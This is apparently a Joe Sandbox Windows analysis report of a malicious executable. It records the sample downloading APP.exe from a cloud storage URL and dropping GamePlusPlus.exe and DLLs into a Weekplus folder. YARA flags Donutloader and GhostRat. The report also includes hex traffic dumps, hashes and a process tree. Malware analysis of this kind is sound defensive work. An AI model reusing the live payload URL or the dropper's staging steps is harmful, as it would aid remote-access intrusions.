2025-01-16 12:44:21 UTC	16336	IN	Data Raw: 00 eb 13 48 63 53 38 83 e1 f7 89 4b 30 48 8d 4b 58 e8 02 da ff ff 48 85 ff 75 04 83 63 30 df c6 43 54 00 44 8a cd 45 8b c6 48 8b cb 48 83 fe 08 75 0a 48 8b d7 e8 9e dc ff ff eb 07 8b d7 e8 69 db ff ff 8b 43 30 c1 e8 07 a8 01 74 1d 83 7b 50 00 74 09 48 8b 4b 48 80 39 30 74 0e 48 ff 4b 48 48 8b 4b 48 c6 01 30 ff 43 50 b0 01 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 48 8b d9 41 8a e8 8b 49 3c 44 8b f2 e8 f2 f7 ff ff 48 8b c8 48 8b f0 48 83 e9 01 74 7e 48 83 e9 01 74 58 48 83 e9 02 74 34 48 83 f9 04 74 17 e8 67 8e 00 00 c7 00 16 00 00 00 e8 90 0b 00 00 32 c0 e9 0b 01 00 00 8b 43 30 48 83 43 20 08 c1 e8 04 a8 01 48 8b 43 20 48 8b 78 f8 eb 5c 8b Data Ascii: HcS8K0HKXHuc0CTDEHHuHiC0t{PtHKH90tHKHHKH0CPH\$0Hl$8Ht$@H\|$HH A^HHXHhHpHx AVH HAI<DHHHt~HtXHt4Htg2C0HC HC Hx\
2025-01-16 12:44:21 UTC	16368	IN	Data Raw: 48 8d 41 08 c6 44 24 50 01 49 89 43 d8 4d 8d 43 10 48 8b 41 40 49 8d 53 d8 49 89 43 e0 48 8b f9 48 8b 49 78 49 8d 43 08 0f 57 c0 49 89 43 f0 33 db f2 0f 11 44 24 58 49 89 5b e8 e8 8c e8 ff ff 38 5c 24 50 74 46 83 f8 01 74 41 38 5f 3a 74 04 b0 01 eb 3a 48 83 87 80 00 00 00 08 48 8b 87 80 00 00 00 48 8b 48 f8 48 85 c9 75 12 e8 fb 4e 00 00 c7 00 16 00 00 00 e8 24 cc ff ff eb 0a 48 8b 44 24 58 b3 01 48 89 01 8a c3 eb 02 32 c0 48 8b 5c 24 60 48 83 c4 40 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 56 41 57 48 83 ec 20 45 33 db 44 8b f2 4c 8b c9 44 38 59 3a 75 5f 48 83 81 80 00 00 00 08 48 8b 81 80 00 00 00 4c 8b 58 f8 4d 85 db 75 31 e8 87 4e 00 00 c7 00 16 00 00 00 e8 b0 cb ff ff 32 c0 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 Data Ascii: HAD$PICMCHA@ISICHHIxICWIC3D$XI[8\$PtFtA8_:t:HHHHHuN$HD$XH2H\$`H@_HHXHhHpHx ATAVAWH E3DLD8Y:u_HHLXMu1N2H\$@Hl$HHt
2025-01-16 12:44:21 UTC	16384	IN	Data Raw: 00 00 00 48 8d 45 18 c6 45 28 00 48 89 45 e0 4c 8d 4d d4 48 8d 45 20 48 89 45 e8 4c 8d 45 e0 48 8d 45 28 48 89 45 f0 48 8d 55 d8 b8 02 00 00 00 48 8d 4d d0 89 45 d4 89 45 d8 e8 55 fe ff ff 83 7d 20 00 74 0b 48 8b 5c 24 60 48 83 c4 50 5d c3 8b cb e8 01 00 00 00 cc 40 53 48 83 ec 20 8b d9 e8 6b 52 00 00 83 f8 01 74 28 65 48 8b 04 25 60 00 00 00 8b 90 bc 00 00 00 c1 ea 08 f6 c2 01 75 11 ff 15 75 f7 00 00 48 8b c8 8b d3 ff 15 72 f7 00 00 8b cb e8 0b 00 00 00 8b cb ff 15 6b f7 00 00 cc cc cc 40 53 48 83 ec 20 48 83 64 24 38 00 4c 8d 44 24 38 8b d9 48 8d 15 de 2b 01 00 33 c9 ff 15 26 f6 00 00 85 c0 74 1f 48 8b 4c 24 38 48 8d 15 de 2b 01 00 ff 15 50 f6 00 00 48 85 c0 74 08 8b cb ff 15 3b f8 00 00 48 8b 4c 24 38 48 85 c9 74 06 ff 15 63 f5 00 00 48 83 c4 20 5b c3 Data Ascii: HEE(HELMHE HELEHE(HEHUHMEEU} tH\$`HP]@SH kRt(eH%`uuHrk@SH Hd$8LD$8H+3&tHL$8H+PHt;HL$8HtcH [
2025-01-16 12:44:21 UTC	16384	IN	Data Raw: 53 0f 87 a5 00 00 00 0f 84 88 00 00 00 41 2b ce 0f 84 17 01 00 00 83 e9 0b 74 48 83 e9 01 74 3b 83 e9 18 74 24 2b ce 74 17 83 f9 04 0f 85 fe 01 00 00 45 84 d2 0f 85 e5 00 00 00 83 0b 10 eb 61 0f ba 2b 07 e9 e2 00 00 00 8b 03 a8 40 0f 85 cd 00 00 00 83 c8 40 e9 ce 00 00 00 41 b3 01 e9 bd 00 00 00 40 84 ff 0f 85 b4 00 00 00 8b 03 40 b7 01 a8 02 0f 85 a7 00 00 00 83 e0 fe 40 8a d7 83 c8 02 89 03 8b 43 04 83 e0 fc 83 c8 04 89 43 04 e9 98 00 00 00 45 84 d2 0f 85 82 00 00 00 44 09 33 41 b2 01 41 8a d2 e9 81 00 00 00 83 e9 54 74 67 83 e9 0e 74 53 83 e9 01 74 3c 83 e9 0b 74 2b 83 e9 06 74 17 83 f9 04 0f 85 62 01 00 00 8b 03 0f ba e0 09 73 4a 0f ba e8 0a eb 4d 8b 03 a9 00 c0 00 00 75 3b 0f ba e8 0e eb 3e 45 84 c9 75 30 0f ba 73 04 0b eb 0a 45 84 c9 75 24 0f ba 6b Data Ascii: SA+tHt;t$+tEa+@@A@@@CCED3AATtgtSt<t+tbsJMu;>Eu0sEu$k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49745	183.66.100.51	443	5892	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 12:44:23 UTC	89	OUT	GET /APP.exe HTTP/1.1 Host: wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com
2025-01-16 12:44:23 UTC	471	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Content-Length: 5632 Connection: close Accept-Ranges: bytes Content-Disposition: attachment Date: Thu, 16 Jan 2025 12:44:23 GMT ETag: "53f534b5be5bd54c0bbd6168c510776e" Last-Modified: Thu, 16 Jan 2025 11:16:56 GMT Server: tencent-cos x-cos-force-download: true x-cos-hash-crc64ecma: 16613075677557648773 x-cos-request-id: Njc4OGZmMjdfMTc3NjA1MGJfYjYyN19iNmY5NmQ3 x-cos-server-side-encryption: AES256
2025-01-16 12:44:23 UTC	5632	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 9d e9 88 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 0c 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdg" @ `@@@

Target ID:	0
Start time:	07:44:03
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe"
Imagebase:	0x7a0000
File size:	23'566'848 bytes
MD5 hash:	EABC234727934AD76F332E7CFB28C80B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3969038874.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4040565455.000000001DF16000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	07:44:22
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\APP.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Weekplus\APP.exe"
Imagebase:	0xe40000
File size:	5'632 bytes
MD5 hash:	53F534B5BE5BD54C0BBD6168C510776E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:44:26
Start date:	16/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:44:35
Start date:	16/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5892 -s 3584
Imagebase:	0x7ff61b6e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:44:36
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.2915314802.000001B59AFF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.2915076303.000001B5996E8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000008.00000002.2915361128.000001B59B050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:44:37
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:44:37
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:44:37
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:44:37
Start date:	16/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5752 -s 1340
Imagebase:	0x7ff61b6e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:45:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000010.00000002.3326654982.00000115DA868000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000010.00000002.3327082496.00000115DC1B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000010.00000002.3326948864.00000115DC150000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:45:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:45:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:45:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:45:34
Start date:	16/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6308 -s 1372
Imagebase:	0x7ff61b6e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:46:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000016.00000002.3916971984.000002C1511F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000016.00000002.3916863440.000002C150E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000016.00000002.3916671618.000002C14F4A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:46:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:46:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:46:34
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff78b870000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:46:34
Start date:	16/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7072 -s 1376
Imagebase:	0x7ff61b6e0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: unknown	Process created: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe "C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe"
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Program Files\Weekplus\APP.exe "C:\Program Files\Weekplus\APP.exe"
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5892 -s 3584
Source: unknown	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe "C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5752 -s 1340
Source: unknown	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe "C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6308 -s 1372
Source: unknown	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe "C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7072 -s 1376
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process created: C:\Program Files\Weekplus\APP.exe "C:\Program Files\Weekplus\APP.exe"	Jump to behavior
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process created: C:\Program Files\Weekplus\GamePlusPlus.exe vrdashboard.exe -duplication_gpu_check

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U6c47#U8054#U652f#U4ed8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Weekplus\APP.exe

C:\Program Files\Weekplus\GamePlusPlus.exe

C:\Program Files\Weekplus\mpclient.dat

C:\Program Files\Weekplus\mpclient64.dat

C:\Program Files\Weekplus\openvr_api.dll

C:\Program Files\Weekplus\steam_api64.dll

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_#U6c47#U8054#U65_216329f15446f2b8c3a5289c0fe9c4b73214d_6b7b5bfd_7fa7792f-7ddb-47c5-8ccd-4ba2ab9f3a72\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_2c21655a-d008-4b91-954d-7b01efd5dfbc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_a3044e01-85db-4e22-b3b1-bca5cac206c0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_ea7bb66d-8dc3-4b8e-b9a7-d202b9eabf7e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER63E5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER64FF.tmp.WERInternalMetadata.xml

Windows Analysis Report
#U6c47#U8054#U652f#U4ed8.exe